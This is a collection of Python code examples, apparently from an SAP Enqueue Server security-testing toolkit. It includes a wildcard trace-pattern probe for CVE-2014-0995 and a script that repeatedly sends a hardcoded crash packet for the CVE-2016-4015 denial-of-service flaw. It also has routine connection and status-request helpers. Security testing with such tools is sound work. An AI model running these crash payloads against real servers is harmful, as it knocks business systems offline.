コード例 #1
0
    def do_check_pattern_loop_dos(self, args):
        """Tests if the server is vulnerable to an endless loop when a trace
        pattern with a wildcard is set (CVE-2014-0995)."""

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send Set trace patterns Info
        patterns = [SAPEnqueueTracePattern(pattern="*", len=1)]
        p = SAPEnqueue(dest=3, adm_opcode=6, adm_trace_level=3,
                       adm_trace_action=4, adm_trace_logging=1,
                       adm_trace_nopatterns=1,
                       adm_trace_nopatterns1=1,
                       adm_trace_patterns=patterns)

        self._debug("Sending trace pattern with wildcards")
        self.connection.send(p)
        self._debug("Trace pattern set")

        p = SAPEnqueue(dest=3, adm_opcode=1)
        try:
            self.connection.sr(p)[SAPEnqueue]
            self._print("Server available, probably not vulnerable to CVE-2014-0995")
        except:
            self._print("Server unavailable, probably vulnerable to CVE-2014-0995.")
コード例 #2
0
def main():
    options = parse_options()

    if options.verbose:
        logging.basicConfig(level=logging.DEBUG)

    print("[*] Testing Enqueue Server CVE-2016-4015 DoS vulnerability on host %s:%d" % (options.remote_host,
                                                                                        options.remote_port))

    # Crafting the item
    payload = Raw("\x06\x01\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00"
                  "\x00\x00\x00\x03Vahagn-pc_5276_0\x00\x00\x00\x00\x02\x00\x00\x00;\x00\x00\x00\x05\x00\x00\x00\x03"
                  "\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x01")
    item = SAPEnqueue(len_frag=89, id=0, more_frags=129, type=187, dest=243, len=89, opcode=160)/payload

    try:
        if options.loop:
            try:
                while True:
                    send_crash(options.remote_host, options.remote_port, item, options.verbose, options.route_string)
                    sleep(options.delay)
            except KeyboardInterrupt:
                print("[*] Cancelled by the user")
        else:
            for i in range(options.number):
                send_crash(options.remote_host, options.remote_port, item, options.verbose, options.route_string)
                sleep(options.delay)

    except SocketError:
        print("[*] Connection error, take a look at the enqueue server process !")
コード例 #3
0
    def do_connect(self, args):
        """Initiate the connection to the Enqueue Server."""

        # Create the socket connection
        try:
            self.connection = SAPEnqueueStreamSocket.get_nisocket(
                self.options.remote_host, self.options.remote_port,
                self.options.route_string)
        except SocketError as e:
            self._error("Error connecting with the Enqueue Server")
            self._error(str(e))
            return

        self._print("Attached to %s / %d" %
                    (self.options.remote_host, self.options.remote_port))

        params = [
            SAPEnqueueParam(param=0,
                            value=int(
                                self.runtimeoptions["client_recv_length"])),
            SAPEnqueueParam(param=1,
                            value=int(
                                self.runtimeoptions["client_send_length"])),
            SAPEnqueueParam(param=3,
                            set_name=self.runtimeoptions["client_name"]),
            SAPEnqueueParam(param=2, value=59),
            SAPEnqueueParam(param=5,
                            value=int(self.runtimeoptions["client_version"])),
            SAPEnqueueParam(param=6, value=1, len=4)
        ]
        # Send Parameter Request packet
        p = SAPEnqueue(dest=6, opcode=1, params=params)

        self._debug("Retrieving parameters")
        response = self.connection.sr(p)[SAPEnqueue]

        # Walk over the server's parameters
        for param in response.params:
            self._debug(
                "Server parameter: %s=%s" %
                (enqueue_param_values[param.param],
                 param.value if param.param not in [0x03] else param.set_name))
            # Save server version and name as runtime options
            if param.param == 0x03:
                self.runtimeoptions["server_name"] = param.set_name
            if param.param == 0x05:
                self.runtimeoptions["server_version"] = param.value

        self._print("Server name: %s" % self.runtimeoptions["server_name"])
        self._print("Server version: %d" %
                    self.runtimeoptions["server_version"])
        self.connected = True
コード例 #4
0
    def do_get_replication_info(self, args):
        """Get information about the status and statistics of the replication."""

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send Get Replication Info
        p = SAPEnqueue(dest=3, adm_opcode=4)

        self._debug("Sending get replication info request")
        response = self.connection.sr(p)[SAPEnqueue]
        response.show()
        self._debug("Obtained replication info")
コード例 #5
0
    def do_dummy_request(self, args):
        """Send a dummy request to the server to check if it is alive. """

        if not self.connected:
            self._error("You need to connect to the server first !")
            return

        # Send Dummy Request
        p = SAPEnqueue(dest=3, adm_opcode=1)

        self._debug("Sending dummy request")
        response = self.connection.sr(p)[SAPEnqueue]
        response.show()
        self._debug("Performed dummy request")